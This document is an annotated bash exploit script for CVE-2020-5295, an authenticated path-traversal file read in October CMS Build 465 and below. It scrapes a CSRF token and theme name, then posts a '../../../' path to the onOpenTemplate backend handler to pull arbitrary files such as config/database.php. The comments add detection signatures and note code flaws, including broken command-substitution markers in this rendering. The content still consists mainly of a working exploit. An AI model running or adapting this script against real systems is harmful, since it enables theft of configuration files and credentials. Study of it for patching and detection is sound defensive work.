# Exploit Title: October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)
# Date: 2020-03-31
# Exploit Author: Sivanesh Ashok
# Vendor Homepage: https://octobercms.com/
# Version: Build 465 and below
# Tested on: Windows 10 / XAMPP / October CMS Build 465
# CVE: CVE-2020-5295
#
# What this script demonstrates (CVE-2020-5295): the October CMS backend AJAX
# handler "onOpenTemplate" is called with type=asset and a path value that the
# script prefixes with ../../../; the requested file's contents come back inside
# a <textarea> in the "tab" field of the JSON response. A backend account that
# already has asset-editing rights can therefore read files outside the theme's
# assets directory.
#
# Defensive notes:
#   - Affected versions: the header above says Build 465 and below; the fix is
#     presumably in later builds -- confirm against the vendor advisory for
#     CVE-2020-5295 before relying on a version number.
#   - Detection: the request this script sends is a POST to /backend/cms carrying
#     "X-OCTOBER-REQUEST-HANDLER: onOpenTemplate" with type=asset and a path
#     parameter containing "../". That combination is a usable alert signature
#     at the web/WAF tier.
#   - Precondition: a valid authenticated backend session for a user who can
#     modify assets (checked below), so backend account hygiene and
#     least-privilege role assignment limit exposure.
#
# Script notes: there is no shebang; the script uses [[ ]], &> and echo -e and
# therefore requires bash. In this rendering the <code> and </code> tokens are
# HTML artifacts standing for backtick command substitution, and some of the
# closing markers are missing.

# Banner. In bash, ''' parses as '' followed by '...' followed by '', so the
# text prints as intended, but this is a Python-style triple quote rather than a
# shell idiom (a here-doc would be the conventional form).
echo '''
Authenticated arbitrary file read exploit for October CMS <= Build 465
Tested on: v1.0.45
'''

# Clears scratch files from a previous run. These are fixed, predictable names
# under /tmp shared with every other user on the host; mktemp would be safer.
rm /tmp/ocms_* &> /dev/null

# Requires "recode" (used at the end to decode HTML entities). The test is on
# the non-emptiness of the substituted output, not on the exit status of
# command -v.
if [[ ! <code>command -v recode</code> ]]; then
  echo -e "[!] Missing package 'recode'\n[!] Install 'recode' using the respective command to resume\n\tsudo apt install recode\n\tsudo pacman -S recode\n\tyum install recode"
  echo -e "[*] Exiting!\n"
  # Exits 0 on this failure path; the success path at the bottom exits 1, which
  # is inverted relative to the usual convention.
  exit 0
fi

# Target and session cookie are read interactively. The cookie is later passed
# on curl's command line, so it is visible in process listings on this machine.
read -p "[*] Enter target host (with http/https): " host
echo ""
read -p "[*] Enter your cookie value: " cookie

# Fetches the backend CMS page with the supplied cookie; the saved HTML is
# reused below for the permission check, the theme name and the CSRF token.
curl -s -X GET -H "Cookie: $cookie" "$host/backend/cms" > /tmp/ocms_gethtml

# Session/permission check: looks for "Assets" inside a nav-label span of the
# page -- presumably the CMS "Assets" sidebar entry shown only to users with
# asset rights; verify against the target's markup. Again a non-empty-string
# test on the substituted output.
if [[ ! <code>awk '/<span class="nav-label">/,/<\/span>/' /tmp/ocms_gethtml | grep "Assets"</code> ]]; then
  echo -e "[-] Invalid cookie\n[-] Either the user does not have the privilege to modify assets or the cookie is invalid"
  echo -e "[*] Exiting!\n"
  exit 0
fi

# The path entered here is appended to the ../../../ prefix in the POST below.
echo '''
[!] Relative path to the target file is required. eg. config/database.php
If you are unsure about the path, check OctoberCMS github which has the default file system hosted
https://github.com/octobercms/october
'''

read -p "[*] Enter path to the target file: " targetfile

# Scraped from the saved page: the theme name (6th "-delimited field of the
# first data-item-theme match) and the CSRF token (4th "-delimited field of the
# csrf-token line). The closing command-substitution marker on both lines is
# lost in this rendering.
themename=<code>grep "data-item-theme" /tmp/ocms_gethtml -m 1 | awk -F'"' '{print $6}'
csrftoken=<code>grep "csrf-token" /tmp/ocms_gethtml | awk -F'"' '{print $4}'

# The vulnerable request: an AJAX call to the onOpenTemplate handler with
# type=asset and a traversal-prefixed path. X-Requested-With and X-CSRF-TOKEN
# mirror the backend's own XHR calls, presumably so the request passes the
# backend's CSRF validation. The raw JSON response is kept for inspection.
curl -s -X POST -H "Cookie: $cookie" -H "X-CSRF-TOKEN: $csrftoken" -H "X-OCTOBER-REQUEST-HANDLER: onOpenTemplate" -H "X-Requested-With: XMLHttpRequest" -d "theme=$themename" -d "type=asset" -d "path=../../../$targetfile" "$host/backend/cms" > /tmp/ocms_jsonres

# Response handling: jq pulls the "tab" field, awk keeps the <textarea> block,
# recode decodes HTML entities back to the file's text. All stderr is
# discarded, so a parse failure surfaces only as an empty /tmp/ocms_file.
cat /tmp/ocms_jsonres | jq -r '.tab' 2> /dev/null | awk '/<textarea/,/<\/textarea>/' 2> /dev/null | recode html > /tmp/ocms_file 2> /dev/null

# Non-empty decoded output is treated as success. Note the exit codes: 1 on
# success and 0 on failure, the reverse of the usual convention.
if [[ <code>cat /tmp/ocms_file</code> ]]; then
  cp /tmp/ocms_file ./october_extractedfile
  echo -e "\n[+] File saved as ./october_extractedfile!\n"
  exit 1
else
  echo -e "\n[-] Error extracting file. Check /tmp/ocms_jsonres for the server response. Exiting!\n"
  exit 0
fi